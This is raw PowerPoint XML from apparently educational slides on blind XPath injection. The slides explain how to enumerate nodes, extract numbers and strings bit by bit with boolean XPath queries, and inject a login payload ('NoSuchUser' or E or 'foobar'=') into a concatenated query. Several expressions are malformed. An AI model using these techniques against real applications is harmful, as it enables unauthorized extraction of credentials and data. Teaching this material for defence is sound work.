              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>count(path/child::node()) - the count of all the nodes for the given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>count(path/child::text()) - number of text fields children (up to 1...).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>count(path/child::comment()) - number of comment nodes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>count(path/child::*) - the number of element children.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>count(path/child::processing-instruction()) - the number of PI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>nodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2319801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fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>It is mandatory for this technique not to list a candidate from a type that is exhausted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Suppose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>counters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>for text sub-nodes, comment sub-nodes, element sub-nodes and PI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>subnodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>respectively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>i &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>::text()) and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>j &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>()) and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>k &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>::*) and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>l &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>::processing-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>instruction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Now, we look at the following node -set expression:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>()[position()=((i+j+k+l+1)] |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>::text()[position()=(i+1)]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Therefore, we can know if the next sub-node is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>text sub-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>asking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>()[position()=((i+j+k+l+1)] |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>path/child::text()[position()=(i+1)])=1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3368697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fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the next 3 queries can be used to know if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subnode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a comment sub-node, an element sub-node, or a PI sub-node:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>()[position()=((i+j+k+l+1)] |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> ()=(j+1)])=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>()[position()=((i+j+k+l+1)] |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>::*()[position()=(k+1)])=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>()[position()=((i+j+k+l+1)] |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>path/child::processing-instruction()[position()=(l+1)])=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A text sub-node value is simply:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>()[position()=N]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A comment sub-node has the following data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>()[position()=N]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3331038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err="1"/>
              <a:t>Booleanization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> of XPath Scalar Queries</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Let us assume that Q is a numeric XPath query (32-bit signed integers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>extract the sign bit of Q: (Q&gt;=0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>Assuming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> Q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> positive, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>extract</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> 31 bits, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> bit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Let K be the number formed by the known N high bits, then the N+1 bit is set to 1, then the rest, 30-N bits, set to 0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>((Q-K)&gt;=0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Yields true if the N+1 bit (from the left) is 1, and false if that bit is 0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=0 and iteratively extract the next bit until we get to N=30, inclusive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>Obtain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>lenght</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(string-length(S))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Reduce the query into a series of byte queries: (substring(S,N,1))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=ceiling(log2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)) – this is the number of bits that are required to determine the symbol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2603655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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ensure that the byte is not a double quote:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(B='”')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> false: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The Nth bit is extracted as following (number(translate(B,”C”,”CN”))=1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If this yields true, then the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>th bit is 1, and if it yields false, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>th bit is 0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324303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Mounting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"string(//user[name/text()='"+TextBox1.Text+"' and password/text()='"+TextBox2.Text+"']/account/text())“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>injecting a username of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NoSuchUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>' or E or '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>'=‘ forces the predicate to yield true if E is a Boolean expression that evaluates to true, and to yield false if E is evaluated as false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We now have a mechanism that extracts a single bit from the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
